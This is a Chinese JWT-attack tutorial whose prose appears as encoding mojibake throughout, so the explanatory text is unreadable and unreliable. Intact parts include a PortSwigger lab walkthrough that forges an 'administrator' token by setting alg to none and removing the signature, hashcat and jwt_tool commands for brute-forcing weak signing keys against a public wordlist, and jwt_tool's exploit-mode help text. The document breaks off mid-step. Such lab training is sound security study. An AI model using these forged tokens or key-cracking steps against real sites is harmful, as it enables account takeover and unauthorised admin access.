ÔÚJWTµÄHeaderÖÐalgµÄÖµÓÃÓÚ¸æËß·þÎñÆ÷Ê¹ÓÃÄÄÖÖËã·¨¶ÔÁîÅÆ½øÐÐÇ©Ãû£¬´Ó¶ø¸æËß·þÎñÆ÷ÔÚÑéÖ¤Ç©ÃûÊ±ÐèÒªÊ¹ÓÃÄÄÖÖËã·¨£¬Ä¿Ç°¿ÉÒÔÑ¡ÔñHS256£¬¼´HMACºÍSHA256£¬JWTÍ¬Ê±Ò²Ö§³Ö½«Ëã·¨Éè¶¨Îª"None"£¬Èç¹û"alg"×Ö¶ÎÉèÎª"None"£¬Ôò±êÊ¶²»Ç©Ãû£¬ÕâÑùÒ»À´ÈÎºÎtoken¶¼ÊÇÓÐÐ§µÄ£¬Éè¶¨¸Ã¹¦ÄÜµÄ×î³õÄ¿µÄÊÇÎªÁË·½±ãµ÷ÊÔ£¬µ«ÊÇÈô²»ÔÚÉú²ú»·¾³ÖÐ¹Ø±Õ¸Ã¹¦ÄÜ£¬¹¥»÷Õß¿ÉÒÔÍ¨¹ý½«alg×Ö¶ÎÉèÖÃÎª"None"À´Î±ÔìËûÃÇÏëÒªµÄÈÎºÎtoken£¬½Ó×Å±ã¿ÉÒÔÊ¹ÓÃÎ±ÔìµÄtokenÃ°³äÈÎÒâÓÃ»§µÇÂ½ÍøÕ¾

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "alg": "none", 
    "typ": "JWT" 
}

</div>

Â©¶´°¸Àý


ÊµÑé°Ð³¡£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification


<img width="554" height="275" src="http://cobjon.com/w/php/upload/202403/01/22c10753.png" alt="vshapes=" "="" style="vertical-align:middle;" />


ÊµÑéÁ÷³Ì£º 
Step 1£ºµã»÷ÉÏ·½µÄ"Access the lab"·ÃÎÊ°Ð³¡»·¾³ 
https://0a9c00a8030ba77784d7b92d00cc0086.web-security-academy.net/





Step 2£ºÊ¹ÓÃÕË»§ÃÜÂë½øÐÐµÇÂ¼

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
wiener:peter

</div>




Step 3£ºµÇÂ¼Ö®ºó¿ÉÒÔ¿´µ½ÈçÏÂ½çÃæ





Step 4£º²¶»ñµ½µÄÊý¾Ý±¨ÐÅÏ¢ÈçÏÂËùÊ¾





½ØÈ¡JWTµÄµÚ¶þ²¿·Ö¶ÔÆä½øÐÐbase64½âÂë:

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MzQ5M30

</div>




½«ÉÏÊöµÄsub×Ö¶ÎÖµ¸ü¸ÄÎª"administrator"

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTM0OTN9

</div>




Step 4£ºÔÚÊ¹ÓÃwienerÓÃ»§µÄÆ¾¾Ý·ÃÎÊ/adminÊÇ»áÌáÊ¾401 Unauthorized





Step 5£º½«µÚÒ»²½·ÖµÄalg²ÎÊý¸ÄÎªnone

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJSUzI1NiJ9

</div>




¸ü¸ÄÖ®ºóµÄheader²¿·Ö£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJub25lIn0=

</div>




Ìæ»»JWT TokenÖÐµÄµÚ¶þ²¿·ÖÎªÖ®Ç°ÎÒÃÇ¹¹ÔìµÄÐÅÏ¢£¬Í¬Ê±ÒÆ³ýÇ©Ãû²¿·Ö£¬ÔÙ´ÎÇëÇóÊý¾Ý»ñÈ¡µ½Ãô¸ÐÊý¾ÝÁ´½Ó





µ÷ÓÃÃô¸ÐÁ´½ÓÒÆ³ýÓÃ»§ÐÅÏ¢£¬Íê³É½âÌâ²Ù×÷£º








ÃÜÔ¿±©Á¦²Â½â


ÃÜÔ¿½éÉÜ


ÔÚJTÖÐÃÜÔ¿ÓÃÓÚÉú³ÉºÍÑéÖ¤Ç©Ãû£¬Òò´ËÃÜÔ¿µÄ°²È«ÐÔ¶ÔJWTµÄ°²È«ÐÔÖÁ¹ØÖØÒª£¬Ò»°ãÀ´ËµJWTÓÐÒÔÏÂÁ½ÖÖÀàÐÍµÄÃÜÔ¿£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
¶Ô³ÆÃÜÔ¿£º¶Ô³ÆÃÜÔ¿ÊÇÒ»ÖÖÊ¹ÓÃÏàÍ¬µÄÃÜÔ¿½øÐÐ¼ÓÃÜºÍ½âÃÜµÄ¼ÓÃÜËã·¨£¬ÔÚJWTÖÐÊ¹ÓÃ¶Ô³ÆÃÜÔ¿À´Éú³ÉºÍÑéÖ¤Ç©Ãû£¬Òò´ËÃÜÔ¿±ØÐë±£ÃÜ£¬Ö»ÓÐ·¢ËÍ·½ºÍ½ÓÊÕ·½ÖªµÀ£¬ÓÉÓÚ¶Ô³ÆÃÜÔ¿µÄ°²È«ÐÔÈ¡¾öÓÚÃÜÔ¿µÄ±£ÃÜÐÔ£¬Òò´ËÐèÒª²ÉÈ¡Ò»Ð©´ëÊ©À´±£»¤Ëü
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
·Ç¶Ô³ÆÃÜÔ¿£º·Ç¶Ô³ÆÃÜÔ¿Ê¹ÓÃ¹«Ô¿ºÍË½Ô¿À´¼ÓÃÜºÍ½âÃÜÊý¾Ý£¬ÔÚJWTÖÐÊ¹ÓÃË½Ô¿Éú³ÉÇ©Ãû£¬¶øÊ¹ÓÃ¹«Ô¿ÑéÖ¤Ç©Ãû£¬ÓÉÓÚ¹«Ô¿¿ÉÒÔ¹«¿ª£¬Òò´Ë·Ç¶Ô³ÆÃÜÔ¿Í¨³£ÓÃÓÚÑéÖ¤·½µÄÉí·Ý
</li>
</ul>

ÏÂÃæÊÇÒ»¸öÊ¹ÓÃJWTºÍ¶Ô³ÆÃÜÔ¿µÄJAVAÊ¾Àý´úÂë£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
import io.jsonwebtoken.Jwts; 
import io.jsonwebtoken.SignatureAlgorithm; 
import java.util.Date; 
 
public class JWTExample { 
    private static final String SECRET_KEY = "mysecretkey"; // ÉèÖÃÃÜÔ¿ 
 
    public static void main(String[] args) { 
        String token = createJWT("123456"); // Éú³ÉJWT 
        System.out.println(token); 
        String result = parseJWT(token); // ÑéÖ¤JWT 
        System.out.println(result); 
    } 
 
    public static String createJWT(String id) { 
        // ÉèÖÃJWT¹ýÆÚÊ±¼äÎª1Ð¡Ê± 
        long nowMillis = System.currentTimeMillis(); 
        Date now = new Date(nowMillis); 
        long expMillis = nowMillis + 3600000; // 1Ð¡Ê± 
        Date exp = new Date(expMillis); 
 
        // Éú³ÉJWT 
        String token = Jwts.builder() 
            .setId(id) 
            .setIssuer("issuer") 
            .setSubject("subject") 
            .setIssuedAt(now) 
            .setExpiration(exp) 
            .signWith(SignatureAlgorithm.HS256, SECRET_KEY) 
            .compact(); 
        return token; 
    } 
 
    public static String parseJWT(String token) { 
        // ÑéÖ¤JWTÊÇ·ñºÏ·¨ 
        String result = ""; 
        try { 
            result = Jwts.parser() 
                .setSigningKey(SECRET_KEY) 
                .parseClaimsJws(token) 
                .getBody() 
                .getId(); 
        } catch (Exception e) { 
            e.printStackTrace(); 
        } 
        return result; 
    } 
}

</div>

ÏÂÃæÊÇÒ»¸öÊ¹ÓÃJWTºÍ·Ç¶Ô³ÆÃÜÔ¿µÄJavaÊ¾Àý´úÂë£¬´úÂëÖÐÊ¹ÓÃÁËRSAËã·¨Éú³É·Ç¶Ô³ÆÃÜÔ¿¶Ô£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
import io.jsonwebtoken.Claims; 
import io.jsonwebtoken.Jwts; 
import io.jsonwebtoken.SignatureAlgorithm; 
import io.jsonwebtoken.security.Keys; 
import java.security.KeyPair; 
import java.security.KeyPairGenerator; 
import java.security.NoSuchAlgorithmException; 
import java.security.PrivateKey; 
import java.security.PublicKey; 
import java.util.Date; 
 
public class JWTExample { 
    private static final String ISSUER = "example.com"; 
    private static final String SUBJECT = "user@example.com"; 
 
    public static void main(String[] args) throws Exception { 
        KeyPair keyPair = generateKeyPair(); 
 
        String token = createJWT(ISSUER, SUBJECT, keyPair.getPrivate()); 
        System.out.println(token); 
 
        Claims claims = parseJWT(token, keyPair.getPublic()); 
        System.out.println(claims.getIssuer()); 
        System.out.println(claims.getSubject()); 
    } 
 
    public static String createJWT(String issuer, String subject, PrivateKey privateKey) { 
        Date now = new Date(); 
        Date expiration = new Date(now.getTime() + 3600 * 1000); // 1 hour 
 
        return Jwts.builder() 
            .setIssuer(issuer) 
            .setSubject(subject) 
            .setIssuedAt(now) 
            .setExpiration(expiration) 
            .signWith(privateKey, SignatureAlgorithm.RS256) 
            .compact(); 
    } 
 
    public static Claims parseJWT(String token, PublicKey publicKey) { 
        return Jwts.parserBuilder() 
            .setSigningKey(publicKey) 
            .build() 
            .parseClaimsJws(token) 
            .getBody(); 
    } 
 
    public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { 
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA"); 
        generator.initialize(2048); 
        return generator.generateKeyPair(); 
    } 
}

</div>

ÔÚÕâ¸öÊ¾ÀýÖÐÎÒÃÇÊ¹ÓÃÁËJavaÖÐµÄKeyPairGeneratorÀàÀ´Éú³ÉÒ»¸ö2048Î»µÄRSAÃÜÔ¿¶Ô£¬È»ºóÊ¹ÓÃË½Ô¿Éú³ÉJWT£¬Ê¹ÓÃ¹«Ô¿ÑéÖ¤JWT£¬ÔÚ´´½¨JWTÊ±ÎÒÃÇÉèÖÃÁËJWTµÄ°ä·¢Õß¡¢Ö÷Ìâ¡¢Ç©·¢Ê±¼äºÍ¹ýÆÚÊ±¼ä²¢Ê¹ÓÃsignWith()·½·¨ºÍSignatureAlgorithm.RS256Ëã·¨Ê¹ÓÃË½Ô¿½øÐÐÇ©Ãû£¬ÔÚÑéÖ¤JWTÊ±ÎÒÃÇÊ¹ÓÃ¹«Ô¿À´½âÎöJWT²¢»ñÈ¡ÉùÃ÷µÄÄÚÈÝ£¬ÔÚÊµ¼ÊµÄÑÐ·¢±àÂëÖÐÎÒÃÇÒ»·½ÃæÒªÍ×ÉÆ±£¹ÜÃÜÔ¿£¬ÁíÒ»·½ÃæÐèÒªÊ¹ÓÃ½ÏÎª¸´ÔÓÄÑÒÔ±»²Â½âµÄÃÜÔ¿×÷ÎªÃÜÔ¿Ê×Ñ¡£¬ÀýÈç£ºËæ»ú×ÖÄ¸+Êý×ÖµÄ32Î»³¤¶È×éºÏ


Â©¶´°¸Àý


ÔÚÊµÏÖJWTÓ¦ÓÃ³ÌÐòÊ±£¬¿ª·¢ÈËÔ±ÓÐÊ±»á·¸Ò»Ð©´íÎó£¬±ÈÈç£ºÍü¼Ç¸ü¸ÄÄ¬ÈÏÃÜÂë»òÕ¼Î»·ûÃÜÂë£¬ËûÃÇÉõÖÁ¿ÉÄÜ¸´ÖÆ²¢Õ³ÌùËûÃÇÔÚÍøÉÏÕÒµ½µÄ´úÂëÆ¬¶ÎÈ»ºóÍü¼Ç¸ü¸Ä×÷ÎªÊ¾ÀýÌá¹©µÄÓ²±àÂëÃØÃÜ£¬ÔÚÕâÖÖÇé¿öÏÂ¹¥»÷ÕßÊ¹ÓÃÖÚËùÖÜÖªµÄÃØÃÜµÄµ¥´ÊÁÐ±íÀ´±©Á¦ÆÆ½â·þÎñÆ÷µÄÃØÃÜÊÇºÜÈÝÒ×µÄ£¬ÏÂÃæÊÇÒ»¸ö¹«¿ªÒÑÖªÃÜÔ¿ÁÐ±í£º 
https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list





ÔÚÕâÀïÎÒÃÇÒ²½¨ÒéÊ¹ÓÃhashcatÀ´Ç¿Á¦ÆÆ½âÃÜÔ¿£¬Äú¿ÉÒÔÊÖ¶¯°²×°hashcat£¬Ò²¿ÉÒÔÔÚKali LinuxÉÏÊ¹ÓÃÔ¤ÏÈ°²×°ºÃµÄhashcat£¬ÄúÖ»ÐèÒªÒ»¸öÀ´×ÔÄ¿±ê·þÎñÆ÷µÄÓÐÐ§µÄ¡¢Ç©ÃûµÄJWTºÍÒ»¸öÖÚËùÖÜÖªµÄÃØÃÜµÄµ¥´Ê±íÈ»ºó¾Í¿ÉÒÔÔËÐÐÒÔÏÂÃüÁî£¬½«JWTºÍµ¥´ÊÁÐ±í×÷Îª²ÎÊý´«Èë:

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
hashcat -a 0 -m 16500 <jwt> <wordlist>

</div>

Hashcat»áÊ¹ÓÃµ¥´ÊÁÐ±íÖÐµÄÃ¿¸öÃÜÔ¿¶ÔÀ´×ÔJWTµÄ±¨Í·ºÍÓÐÐ§ÔØºÉ½øÐÐÇ©Ãû£¬È»ºó½«½á¹ûÇ©ÃûÓëÀ´×Ô·þÎñÆ÷µÄÔÊ¼Ç©Ãû½øÐÐ±È½Ï£¬Èç¹ûÓÐÈÎºÎÇ©ÃûÆ¥Åä£¬hashcat½«°´ÕÕÒÔÏÂ¸ñÊ½Êä³öÊ¶±ð³öµÄÃØÃÜÒÔ¼°ÆäËû¸÷ÖÖÏêÏ¸ÐÅÏ¢£¬ÓÉÓÚhashcatÔÚ±¾µØ»úÆ÷ÉÏÔËÐÐ²»ÒÀÀµÓÚÏò·þÎñÆ÷·¢ËÍÇëÇó£¬ËùÒÔÕâ¸ö¹ý³Ì·Ç³£¿ì£¬¼´Ê¹Ê¹ÓÃÒ»¸ö¾Þ´óµÄµ¥´Ê±íÒ»µ©ÄúÈ·¶¨ÁËÃÜÔ¿£¬Äú¾Í¿ÉÒÔÊ¹ÓÃËüÎªÈÎºÎJWT±¨Í·ºÍÓÐÐ§ÔØºÉÉú³ÉÓÐÐ§µÄÇ©Ãû

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
<jwt>:<identified-secret>

</div>

°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key





ÊµÑé²½Öè£º 
Step 1£ºµã»÷ÉÏÊö"Access the lab"½øÈëµ½°Ð³¡»·¾³





Step 2£ºÊ¹ÓÃÒÔÏÂÕË»§½øÐÐµÇÂ¼²Ù×÷

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
wiener:peter

</div>




Step 3£º²¶»ñµ½ÈçÏÂÓÐÐ§µÄJWTÆ¾¾ÝÐÅÏ¢

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw

</div>







Step 5£ºÊ¹ÓÃ×Öµä½øÐÐ±©Á¦²Â½â²Ù×÷


·½Ê½Ò»£ºHashCat 
ÏîÄ¿µØÖ·£ºhttps://github.com/hashcat/hashcat 
ÏîÄ¿Ê¹ÓÃ£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
#ÃüÁî¸ñÊ½£º 
hashcat -a 0 -m 16500 <jwt> <wordlist> 
 
#Ö´ÐÐÊ¾Àý£º 
hashcat -m 16500 jwt.txt -a 0 secrets.txt --force

</div>




·½Ê½¶þ£ºjwt_tool 
ÏîÄ¿µØÖ·£ºhttps://github.com/ticarpi/jwt_tool 
ÏîÄ¿½éÉÜ£º´ËÏîÄ¿Ö÷ÒªÓÃÓÚJWT°²È«´àÈõÐÔÆÀ¹À£¬Ä¿Ç°Ö§³ÖÈçÏÂ¼¸ÖÖ°²È«ÆÀ¹À²âÊÔ

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
(CVE-2015-2951) The alg=none signature-bypass vulnerability
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
(CVE-2016-10555) The RS/HS256 public key mismatch vulnerability
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
(CVE-2018-0114) Key injection vulnerability
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
(CVE-2019-20933/CVE-2020-28637) Blank password vulnerability
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
(CVE-2020-28042) Null signature vulnerability
</li>
</ul>




Step 1£º¿ËÂ¡ÏîÄ¿µ½±¾µØ

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
https://github.com/ticarpi/jwt_tool

</div>




Step 2£º°²×°ÒÀÀµ¿â

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
pip3 install pycryptodomex

</div>

Step 3£ºÔËÐÐjwt_tool²¢²é¿´ÓÃ·¨ÐÅÏ¢

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
python3 jwt_tool.py -h

</div>



<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np] [-nr] [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM] [-pc PAYLOADCLAIM] [-hv HEADERVALUE] 
                   [-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE] [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v] 
                   [jwt] 
 
positional arguments: 
  jwt                   the JWT to tinker with (no need to specify if in header/cookies) 
 
options: 
  -h, --help            show this help message and exit 
  -b, --bare            return TOKENS ONLY 
  -t TARGETURL, --targeturl TARGETURL 
                        URL to send HTTP request to with new JWT 
  -rc COOKIES, --cookies COOKIES 
                        request cookies to send with the forged HTTP request 
  -rh HEADERS, --headers HEADERS 
                        request headers to send with the forged HTTP request (can be used multiple times for additional headers) 
  -pd POSTDATA, --postdata POSTDATA 
                        text string that contains all the data to be sent in a POST request 
  -cv CANARYVALUE, --canaryvalue CANARYVALUE 
                        text string that appears in response for valid token (e.g. "Welcome, ticarpi") 
  -np, --noproxy        disable proxy for current request (change in jwtconf.ini if permanent) 
  -nr, --noredir        disable redirects for current request (change in jwtconf.ini if permanent) 
  -M MODE, --mode MODE  Scanning mode: 
                        pb = playbook audit 
                        er = fuzz existing claims to force errors 
                        cc = fuzz common claims 
                        at - All Tests! 
  -X EXPLOIT, --exploit EXPLOIT 
                        eXploit known vulnerabilities: 
                        a = alg:none 
                        n = null signature 
                        b = blank password accepted in signature 
                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack) 
                        k = key confusion (specify public key with -pk) 
                        i = inject inline JWKS 
  -ju JWKSURL, --jwksurl JWKSURL 
                        URL location where you can host a spoofed JWKS 
  -S SIGN, --sign SIGN  sign the resulting token: 
                        hs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p) 
                        rs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr) 
                        es256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr) 
                        ps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr) 
  -pr PRIVKEY, --privkey PRIVKEY 
                        Private Key for Asymmetric crypto 
  -T, --tamper          tamper with the JWT contents 
                        (set signing options with -S or use exploits with -X) 
  -I, --injectclaims    inject new claims and update existing claims with new values 
                        (set signing options with -S or use exploits with -X) 
                        (set target claim with -hc/-pc and injection values/lists with -hv/-pv 
  -hc HEADERCLAIM, --headerclaim HEADERCLAIM 
                        Header claim to tamper with 
  -pc PAYLOADCLAIM, --payloadclaim PAYLOADCLAIM 
                        Payload claim to tamper with 
  -hv HEADERVALUE, --headervalue HEADERVALUE 
                        Value (or file containing values) to inject into tampered header claim 
  -pv PAYLOADVALUE, --payloadvalue PAYLOADVALUE 
                        Value (or file containing values) to inject into tampered payload claim 
  -C, --crack           crack key for an HMAC-SHA token 
                        (specify -d/-p/-kf) 
  -d DICT, --dict DICT  dictionary file for cracking 
  -p PASSWORD, --password PASSWORD 
                        password for cracking 
  -kf KEYFILE, --keyfile KEYFILE 
                        keyfile for cracking (when signed with 'kid' attacks) 
  -V, --verify          verify the RSA signature against a Public Key 
                        (specify -pk/-jw) 
  -pk PUBKEY, --pubkey PUBKEY 
                        Public Key for Asymmetric crypto 
  -jw JWKSFILE, --jwksfile JWKSFILE 
                        JSON Web Key Store for Asymmetric crypto 
  -Q QUERY, --query QUERY 
                        Query a token ID against the logfile to see the details of that request 
                        e.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a 
  -v, --verbose         When parsing and printing, produce (slightly more) verbose output. 
 
If you don't have a token, try this one: 
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po

</div>

Step 4£º±©Á¦²Â½âÃÜÔ¿

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
